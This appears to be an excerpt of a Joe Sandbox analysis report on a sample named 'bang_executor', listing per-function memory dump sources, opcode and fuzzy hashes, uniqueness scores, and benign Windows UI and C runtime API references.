                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: HeapProcess
                                        • String ID:
                                        • API String ID: 54951025-0
                                        • Opcode ID: c533087dd0ffbde2ebef9dd7f8ef9ff04bffa44157086eaa78d3d37b4bc7e548
                                        • Instruction ID: be551d81d159dad7ce18fc91f5564ac1f4f94cb299316ceb1b1130ddd93b8d19
                                        • Opcode Fuzzy Hash: c533087dd0ffbde2ebef9dd7f8ef9ff04bffa44157086eaa78d3d37b4bc7e548
                                        • Instruction Fuzzy Hash: E2A012701002009B83004F3259043883994E513184300C0155005C0220D6254014AF01
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 004F82D0 Relevance: .8, Instructions: 807COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 90c3c98ec23a744960941777bc03b1281d3b488c6a7f7634cefa33c0df39adee
                                        • Instruction ID: f8df8a799649baefdc9a75dab5b9f206daae2c007b0e5ea2e85e0de473ea1f73
                                        • Opcode Fuzzy Hash: 90c3c98ec23a744960941777bc03b1281d3b488c6a7f7634cefa33c0df39adee
                                        • Instruction Fuzzy Hash: CB623B316047898FCB29CF38C8906BA7BE1AF95304F18855FDA9B8F342DB38A945C715
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 004F976F Relevance: .8, Instructions: 781COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e008b3fe25645c420bb524d8f5ec445355e06715b0fa383b64c6e5b3b3f0fe45
                                        • Instruction ID: 16ae283b0bb9cf022489c795943b8a7716e3c4f6654fee9e8de44ea7a6a88a80
                                        • Opcode Fuzzy Hash: e008b3fe25645c420bb524d8f5ec445355e06715b0fa383b64c6e5b3b3f0fe45
                                        • Instruction Fuzzy Hash: C66239716083899FCB18DF28C5906B9BBE1BF85304F08816EED998B346D738ED45CB59
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 004F1476 Relevance: .7, Instructions: 694COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 7b613aa6936206879556b4b98a40ab473639d5810861dad884f2e1ee316ea20b
                                        • Instruction ID: 7ad83c4169db3baa391fd6a9d51b633276c697af7f1572790a949292cecba69f
                                        • Opcode Fuzzy Hash: 7b613aa6936206879556b4b98a40ab473639d5810861dad884f2e1ee316ea20b
                                        • Instruction Fuzzy Hash: 62525A726087018FC718CF19C891A6AF7E1FFCC304F498A2DE5959B255D734EA19CB86
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 004F9111 Relevance: .5, Instructions: 528COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 1e5176716bdf17c859044e2bd954c436fb629172f6deec5d78228e269f76729b
                                        • Instruction ID: 0fb63e7a8e068055b2db44cf793dc63cdb266bdfa910e8fe203cbb61f077bb87
                                        • Opcode Fuzzy Hash: 1e5176716bdf17c859044e2bd954c436fb629172f6deec5d78228e269f76729b
                                        • Instruction Fuzzy Hash: 6512E47160470A9FD728CF28C5907B9B7E0FB59308F10892FEA97C7680D378A995CB49
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 004EE394 Relevance: .5, Instructions: 460COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: bb0fbfd5b7427766d505987a6ef212b5a7e779de2dbbd00876df02a50681dd87
                                        • Instruction ID: a25f93e468c6587dcbcdbf24cb58a894acd1dfe1f359dee34831db9888694f8c
                                        • Opcode Fuzzy Hash: bb0fbfd5b7427766d505987a6ef212b5a7e779de2dbbd00876df02a50681dd87
                                        • Instruction Fuzzy Hash: 67F19971A083918FC718DF2AC584A2ABBE5FF99305F144A2EE4C5D7352D738E905CB4A
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 004F0949 Relevance: .3, Instructions: 330COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 6eda43a95c1c2f1825c8bdbbc01ba5bb96ca6448e15225cf5c8fcafe88848279
                                        • Instruction ID: 72074199c6c25d289a11758c8d297d725bbba872bfe6b5440188b70676e0dafd
                                        • Opcode Fuzzy Hash: 6eda43a95c1c2f1825c8bdbbc01ba5bb96ca6448e15225cf5c8fcafe88848279
                                        • Instruction Fuzzy Hash: 00E15A745183958FC314CF29D49082BBBF0BFAA300F46095EF9D497352D234EA5ADBA2
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 004F60F7 Relevance: .3, Instructions: 278COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 080d2b6761db61e46b019b21103b120f8970813ee5a797b6b743ce0b2c1cdfdd
                                        • Instruction ID: cc56ad7aa477f5ce02a0e27307d3a8755e78c9402a09dd365eba22705b1bd8b5
                                        • Opcode Fuzzy Hash: 080d2b6761db61e46b019b21103b120f8970813ee5a797b6b743ce0b2c1cdfdd
                                        • Instruction Fuzzy Hash: 109154B020074D8BDB24EF75D991BBB7795AB90308F11082FEB9687382DA7C9505C75A
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 004F6445 Relevance: .3, Instructions: 254COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 44c8a7837ba84787dc7f2519c9374f56e2ac86870b0fbf95f58b9e70adfd8c0c
                                        • Instruction ID: 97e3be851d60f6ee3b0689c4c651101c4aa2aace42d8614b53fa547d91440397
                                        • Opcode Fuzzy Hash: 44c8a7837ba84787dc7f2519c9374f56e2ac86870b0fbf95f58b9e70adfd8c0c
                                        • Instruction Fuzzy Hash: B8813E717043495BEB24EE29C5C17BE77D59B95308F01083FEB86CB382DA689885875E
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00507967 Relevance: .2, Instructions: 237COMMONLIBRARYCODE
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: dfbbbf000fc6126a3a720e2c8d204c6b541ec561fd01c7073ef32f6ebf56af52
                                        • Instruction ID: 27721ebd6ce68c07630e03d797abe1de3ea044f3fcb54c1844ba8b40d2d479ee
                                        • Opcode Fuzzy Hash: dfbbbf000fc6126a3a720e2c8d204c6b541ec561fd01c7073ef32f6ebf56af52
                                        • Instruction Fuzzy Hash: CE613B71F4C60E66DE345A28885ABBE7F94FB4D704F140D1AE983DB2C2E511BE42C355
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00507738 Relevance: .2, Instructions: 214COMMONLIBRARYCODE
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5deea3b29f66a918188f7a75532971316276c2599c24e1ebb0fa75850081f94e
                                        • Instruction ID: 007bb1bdded3cd7c1ad1e3fbf9a6413850e63ce3f253cbd566efbb95fd3a5480
                                        • Opcode Fuzzy Hash: 5deea3b29f66a918188f7a75532971316276c2599c24e1ebb0fa75850081f94e
                                        • Instruction Fuzzy Hash: F0515671E0C60E56EB384968855EBBE2F85FF5D380F184D09D982DB2C2D605FD06C3A6
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 004F0FAC Relevance: .2, Instructions: 171COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: dfbd3c0747b9ad007107f5f03d73e46f79d42f1bc5cfc0b2e807b70722fa8b34
                                        • Instruction ID: 96263cf4bda051787934f04ed72db09d09b330f5f300dbf983a5ecd3cebb65eb
                                        • Opcode Fuzzy Hash: dfbd3c0747b9ad007107f5f03d73e46f79d42f1bc5cfc0b2e807b70722fa8b34
                                        • Instruction Fuzzy Hash: 595145355083D98FC701CF39C58047FBFE0AE9A714F4A089EE6D94B252D231DA8ACB56
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 004F2125 Relevance: .1, Instructions: 148COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 52f9ba8516b64880346e502abdccec4a69aa495762a1b4f3aab486678e535b6d
                                        • Instruction ID: 76825d48e272f37a71b1031b3876a9710628d295646a360d485d17e95e899fc7
                                        • Opcode Fuzzy Hash: 52f9ba8516b64880346e502abdccec4a69aa495762a1b4f3aab486678e535b6d
                                        • Instruction Fuzzy Hash: CD51E1B1A087159FC748CF19D98055AF7E1FF88314F058A2EE899E3340DB34E955CB9A
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 004F5E86 Relevance: .1, Instructions: 112COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a36805445e229c2b90d29c9fa108318b87a70c956e41b8f0a663b46aa5c9b3d3
                                        • Instruction ID: 52c2cb8988d819f7c3609a69740167199567a53a3982bf70da6046769eacc280
                                        • Opcode Fuzzy Hash: a36805445e229c2b90d29c9fa108318b87a70c956e41b8f0a663b46aa5c9b3d3
                                        • Instruction Fuzzy Hash: EC3103B1614B099FC714DF29C89116FBBD0EB95305F10492EF595C7342C738E90ACB9A
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 004F0244 Relevance: 28.2, APIs: 12, Strings: 4, Instructions: 240COMMON
                                        Download Yara Rule
                                        APIs
                                        • _swprintf.LIBCMT ref: 004F0284
                                          • Part of subcall function 004E4C00: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 004E4C13
                                          • Part of subcall function 004F3F47: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,004EF801,00000000,00000000,?,00525070,?,004EF801,?,?,00000050,?), ref: 004F3F64
                                        • _strlen.LIBCMT ref: 004F02A5
                                        • SetDlgItemTextW.USER32(?,00522274,?), ref: 004F02FE
                                        • GetWindowRect.USER32(?,?), ref: 004F0334
                                        • GetClientRect.USER32(?,?), ref: 004F0340
                                        • GetWindowLongW.USER32(?,000000F0), ref: 004F03EB
                                        • GetWindowRect.USER32(?,?), ref: 004F041B
                                        • SetWindowTextW.USER32(?,?), ref: 004F044A
                                        • GetSystemMetrics.USER32(00000008), ref: 004F0452
                                        • GetWindow.USER32(?,00000005), ref: 004F045D
                                        • GetWindowRect.USER32(00000000,?), ref: 004F048D
                                        • GetWindow.USER32(00000000,00000002), ref: 004F04FF
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
                                        • String ID: $%s:$CAPTION$d$t"R
                                        • API String ID: 2407758923-968809607
                                        • Opcode ID: 3ecd608ba91f0bcbf6c5efc77268e4b67939bcd23836c3da86cfbce60593f58f
                                        • Instruction ID: 97ba13efb54da6738507599344ac18b466bbdcc948a0c815ede7fee1b47e9c8d
                                        • Opcode Fuzzy Hash: 3ecd608ba91f0bcbf6c5efc77268e4b67939bcd23836c3da86cfbce60593f58f
                                        • Instruction Fuzzy Hash: 52818B72508345AFD714DF68CD89A6FBBE9EBC9708F00191EFA8493291D734E909CB52
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0050F172 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 114COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • ___free_lconv_mon.LIBCMT ref: 0050F1B6
                                          • Part of subcall function 0050ED51: _free.LIBCMT ref: 0050ED6E
                                          • Part of subcall function 0050ED51: _free.LIBCMT ref: 0050ED80
                                          • Part of subcall function 0050ED51: _free.LIBCMT ref: 0050ED92
                                          • Part of subcall function 0050ED51: _free.LIBCMT ref: 0050EDA4
                                          • Part of subcall function 0050ED51: _free.LIBCMT ref: 0050EDB6
                                          • Part of subcall function 0050ED51: _free.LIBCMT ref: 0050EDC8
                                          • Part of subcall function 0050ED51: _free.LIBCMT ref: 0050EDDA
                                          • Part of subcall function 0050ED51: _free.LIBCMT ref: 0050EDEC
                                          • Part of subcall function 0050ED51: _free.LIBCMT ref: 0050EDFE
                                          • Part of subcall function 0050ED51: _free.LIBCMT ref: 0050EE10
                                          • Part of subcall function 0050ED51: _free.LIBCMT ref: 0050EE22
                                          • Part of subcall function 0050ED51: _free.LIBCMT ref: 0050EE34
                                          • Part of subcall function 0050ED51: _free.LIBCMT ref: 0050EE46
                                        • _free.LIBCMT ref: 0050F1AB
                                          • Part of subcall function 0050BAFA: RtlFreeHeap.NTDLL(00000000,00000000,?,0050EEE6,?,00000000,?,00000000,?,0050EF0D,?,00000007,?,?,0050F30A,?), ref: 0050BB10
                                          • Part of subcall function 0050BAFA: GetLastError.KERNEL32(?,?,0050EEE6,?,00000000,?,00000000,?,0050EF0D,?,00000007,?,?,0050F30A,?,?), ref: 0050BB22
                                        • _free.LIBCMT ref: 0050F1CD
                                        • _free.LIBCMT ref: 0050F1E2
                                        • _free.LIBCMT ref: 0050F1ED
                                        • _free.LIBCMT ref: 0050F20F
